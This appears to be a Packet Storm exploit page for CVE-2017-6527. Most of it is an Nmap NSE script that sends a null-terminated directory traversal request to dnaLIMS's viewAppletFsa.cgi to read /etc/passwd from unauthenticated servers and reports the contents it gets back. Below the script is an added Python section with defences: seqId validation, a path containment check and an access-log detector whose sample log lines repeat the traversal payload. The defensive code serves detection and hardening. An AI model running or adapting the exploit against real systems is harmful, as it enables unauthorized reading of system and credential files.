dnaTools dnaLIMS 4-2015s13 Directory Traversal Nmap NSE Script

Posted Apr 8, 2017
Authored by Rewanth Cool

This NSE script for Nmap exploits a directory traversal vulnerability in dnaTools dnaLIMS version 4-2015s13.

tags | exploit
advisories | CVE-2017-6527
SHA-256 | 14000eb7e96ae44276fb5bd1d81181a295942cd488c90f9058e76d64598d4a63

local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"

description = [[
dnaLIMS is prone to the Directory Traversal attack.
The viewAppletFsa.cgi seqID parameter is vulnerable to a null terminated directory traversal attack.
This allows an unauthenticated attacker to retrieve files on the operating system accessible by
the permissions of the web server. This page also does not require authentication, allowing
any person on the Internet to exploit this vulnerability.
]]

---
-- @usage
-- nmap --script http-vuln-cve2017-6527 <url>
--
-- @args
-- http-vuln-cve2017-6527.uri
--   Default: '/' (Suggested)
--
-- @output
-- PORT   STATE SERVICE
-- 80/tcp open  http
-- | http-vuln-cve2017-6527:
-- |   VULNERABLE:
-- |   dnaLIMS is prone to the Directory Traversal attack.
-- |     State: VULNERABLE (Exploitable)
-- |     IDs:
-- |       CVE: CVE-2017-6527
-- |       CWE: 22
-- |     The viewAppletFsa.cgi seqID parameter is vulnerable to a null terminated directory traversal attack.
-- |     This allows an unauthenticated attacker to retrieve files on the operating system accessible by
-- |     the permissions of the web server. This page also does not require authentication, allowing
-- |     any person on the Internet to exploit this vulnerability.
-- |
-- |     References:
-- |       https://www.cvedetails.com/cve/CVE-2017-6527
-- |_      https://www.cvedetails.com/cwe-details/22/cwe.html
---

author = "Rewanth Cool"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "intrusive", "exploit"}

portrule = shortport.port_or_service({80, 443}, {"http", "https"}, "tcp", "open")

action = function(host, port)
  local uri = stdnse.get_script_args(SCRIPT_NAME .. ".uri") or "/"
  local vulnPath = "cgi-bin/dna/viewAppletFsa.cgi?seqId=../../../../../../etc/passwd%00&Action=blast&hidenav=1"
  local path = uri .. vulnPath

  -- host is a table, so log its address rather than concatenating the table itself
  stdnse.debug1("GET request being processed with payload on %s:%d%s", host.ip, port.number, path)

  -- Exploiting the vulnerability
  local response = http.get(host, port, path)

  -- A failed request leaves status nil; only a 200 with a body is worth inspecting
  if not response or response.status ~= 200 or not response.body then
    return nil
  end

  local vulnReport = vulns.Report:new(SCRIPT_NAME, host, port)
  -- IDS, references and dates are sibling fields of the vuln table in the vulns library
  local vuln = {
    title = "dnaLIMS is prone to the Directory Traversal attack.",
    state = vulns.STATE.NOT_VULN,
    description = [[
The viewAppletFsa.cgi seqID parameter is vulnerable to a null terminated directory traversal attack.
This allows an unauthenticated attacker to retrieve files on the operating system accessible by
the permissions of the web server. This page also does not require authentication, allowing
any person on the Internet to exploit this vulnerability.
    ]],
    IDS = {
      CVE = "CVE-2017-6527",
      CWE = "22",
    },
    references = {
      "https://www.cvedetails.com/cve/CVE-2017-6527",
      "https://www.cvedetails.com/cwe-details/22/cwe.html",
    },
    dates = {
      disclosure = { year = "2017", month = "03", day = "09" },
    },
  }

  -- Matching the /etc/passwd pattern (name:passwd:uid:gid:gecos:home:shell)
  if string.match(response.body, "([^:]+):([^:]+):([^:]+):([^:]+)::?([^:]+):([^:]+):([^:]+)") then
    vuln.state = vulns.STATE.EXPLOIT
    vuln.exploit_results = response.body
  end

  -- NOT_VULN results are only shown at higher verbosity; EXPLOIT is always reported
  return vulnReport:make_output(vuln)
end
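The script above probes a single payload: a `../` sequence to leave the sequence directory plus a `%00` to truncate the filename in the CGI's underlying open() call. As an added example (not part of this page, of the NSE script, or of dnaTools' code), the Python below shows the defender's side of the same flaw in two parts: the allow-list and containment check a handler should apply to `seqId` before touching the filesystem, and a detector that flags the request shape in web-server access logs, including percent-encoded and double-encoded variants. The base directory `/var/dnalims/seq`, the `.fsa` suffix and the sample log lines are assumptions and constructed data, not taken from the page.

```python
"""Defender-side counterparts to the seqId traversal probed by the NSE script.

Added example: not part of this page, of the NSE script, or of dnaTools' code.
Assumptions (none come from the page): sequence files live under SEQ_BASE with a
.fsa suffix, and the web server writes Combined Log Format access logs.
"""
import os
import re
from urllib.parse import parse_qs, unquote

# Hypothetical base directory for sequence files.
SEQ_BASE = "/var/dnalims/seq"

# Identifier shape we accept: reject-by-default rather than trying to strip "../".
SEQ_ID_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")
# A ".." path segment anywhere in a decoded value.
TRAVERSAL_RE = re.compile(r"(^|/)\.\.(/|$)")
# Combined Log Format: ip ident user [ts] "method target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable (bounded), so %2e%2e and %252e%252e both become '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_seq_path(seq_id: str, base: str = SEQ_BASE) -> str:
    """Map a seqId parameter to a file under base, or raise ValueError.

    The page's payload (../../../../../../etc/passwd%00) combines traversal with a
    NUL byte that truncates the filename in a C-level open(); each trick is
    rejected on its own below.
    """
    decoded = fully_decode(seq_id)
    if "\x00" in decoded:
        raise ValueError("NUL byte in seqId")
    if not SEQ_ID_RE.fullmatch(decoded):
        raise ValueError("seqId outside the allowed identifier shape")
    # Containment check after normalisation: defence in depth behind the allow-list.
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, decoded + ".fsa"))
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise ValueError("seqId escapes the sequence directory")
    return candidate


def seq_id_is_safe(seq_id: str) -> bool:
    """Boolean wrapper around resolve_seq_path for callers that only need a verdict."""
    try:
        resolve_seq_path(seq_id)
    except ValueError:
        return False
    return True


def find_traversal_attempts(log_text: str) -> list:
    """Flag viewAppletFsa.cgi requests whose seqId carries '..' or a NUL after decoding.

    A 200 on such a request means the file was served and the host should be treated
    as exposed; a 404 still records a probe worth correlating by source IP.
    """
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m["target"].partition("?")
        if not path.endswith("/viewAppletFsa.cgi"):
            continue
        for value in parse_qs(query, keep_blank_values=True).get("seqId", []):
            value = fully_decode(value)
            if TRAVERSAL_RE.search(value) or "\x00" in value:
                findings.append({
                    "ip": m["ip"],
                    "ts": m["ts"],
                    "status": int(m["status"]),
                    "served": m["status"] == "200",
                    "seq_id": value.replace("\x00", "\\x00"),
                })
    return findings


# Constructed access-log lines for the demo; not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Apr/2017:10:00:01 +0000] "GET /cgi-bin/dna/viewAppletFsa.cgi?seqId=ABC123&Action=blast&hidenav=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [08/Apr/2017:10:00:02 +0000] "GET /cgi-bin/dna/viewAppletFsa.cgi?seqId=../../../../../../etc/passwd%00&Action=blast&hidenav=1 HTTP/1.1" 200 1873 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
203.0.113.9 - - [08/Apr/2017:10:00:03 +0000] "GET /cgi-bin/dna/viewAppletFsa.cgi?seqId=..%2f..%2f..%2fetc%2fpasswd%2500 HTTP/1.1" 404 210 "-" "curl/7.52.1"
198.51.100.2 - - [08/Apr/2017:10:00:04 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for finding in find_traversal_attempts(SAMPLE_LOG):
        print(finding)
    print(seq_id_is_safe("ABC123"), seq_id_is_safe("../../../../../../etc/passwd%00"))
```

The allow-list does the real work in `resolve_seq_path`; the realpath containment check only matters if the identifier rules are later loosened, which is exactly when it pays off. In the detector, decoding after `parse_qs` (which already decodes once) is what lets the double-encoded `%2500` line surface as the same NUL-terminated traversal the script sends, and the `served` flag separates a successful read from a probe that the server rejected.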

© 2022 Packet Storm. All rights reserved.